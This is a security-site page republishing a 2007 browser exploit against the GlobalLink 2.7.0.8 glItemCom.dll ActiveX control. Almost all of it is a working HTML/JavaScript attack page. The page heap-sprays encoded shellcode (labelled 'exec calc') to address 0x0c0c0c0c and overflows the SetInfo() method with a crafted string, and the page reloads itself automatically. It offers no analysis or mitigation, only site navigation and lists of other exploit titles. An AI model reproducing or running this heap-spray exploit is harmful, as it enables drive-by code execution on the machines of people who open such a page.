首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 GlobalLink 2.7.0.8 glItemCom.dll SetInfo() Heap Overflow Exploit 来源：www.vfocus.net 作者：vfocus 发布时间：2007-09-06   <html> <body> <object id="gl" classid="clsid:1C9B434A-0898-498A-B802-B00FA0962214"></object> <script> document.write("<meta http-equiv=\"refresh\" content=\"1, " + window.location.href + "\"></meta>"); var heapSprayToAddress = 0x0c0c0c0c; var shellcode = unescape( "%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" + // exec calc "%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%uf513" + "%ue2ce%u8369%ufceb%uf4e2%u2609%u69a6%ucef5%u2c69" + "%u45c9%u6c9e%ucf8d%ue20d%ud6ba%u3669%ucfd5%u2009" + "%ufa7e%u6869%uff1b%uf022%u4a59%u1d22%u0ff2%u6428" + "%u0cf4%u9d09%u9ace%u6dc6%u2b80%u3669%ucfd1%u0f09" + "%uc27e%ue2a9%ud2aa%u82e3%ud27e%u6869%u471e%u4dbe" + "%u0df1%ua9d3%u4591%u59a2%u0e70%u659a%u8e7e%ue2ee" + "%ud285%ue24f%uc69d%u6009%u4e7e%u6952%ucef5%u0169" + "%u91c9%u9fd3%u9895%u916b%u0e76%u3999%u3e9d%u6d68" + "%ua6aa%u977a%uc07f%u96b5%uad12%u0583%uce96%u69e2" ); var heapBlockSize = 0x100000; var payLoadSize = shellcode.length * 2; var spraySlideSize = heapBlockSize - (payLoadSize+0x38); var spraySlide = unescape("%u0c0c%u0c0c"); spraySlide = getSpraySlide(spraySlide,spraySlideSize); heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize; memory = new Array(); for (i=0;i<heapBlocks;i++) {    memory[i] = spraySlide + shellcode; } function getSpraySlide(spraySlide, spraySlideSize) { while (spraySlide.length*2<spraySlideSize) {    spraySlide += spraySlide; } spraySlide = spraySlide.substring(0,spraySlideSize/2); return spraySlide; } var s = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + "\x0c\x0c\x0c\x0c"; gl.SetInfo("", "", "", 1, 1, 1, "", s); </script> </body> </html>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·AtomixMP3 2.3 (pls File) Local ·Trend Micro ServerProtect eng5 ·Microsoft Visual Basic 6.0 VBP ·Microsoft Visual FoxPro 6.0 (F ·CCProxy <= v6.2 Telnet Proxy P ·Microsoft SQL Server Distribut ·Apple Quicktime < 7.2 SMIL Rem ·Ultra Crypto Component (Crypto ·OTSTurntables 1.00 (m3u File) ·Ultra Crypto Component (Crypto ·Yahoo! Messenger (YVerInfo.dll ·Lighttpd <= 1.4.16 FastCGI Hea   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved